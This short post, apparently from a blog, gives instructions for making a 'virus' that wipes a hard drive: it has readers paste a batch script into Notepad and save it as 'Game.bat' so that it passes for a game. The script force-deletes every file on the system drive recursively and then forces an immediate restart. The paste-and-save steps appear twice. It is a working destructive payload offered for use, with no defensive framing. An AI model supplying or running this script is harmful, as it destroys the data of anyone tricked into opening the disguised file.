This is how to create a virus that deletes the content of your hard drive.
Paste this code in notepad
Save it as Game.bat
Paste this code in notepad
Save it as Game.bat
@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00

No comments:
Post a Comment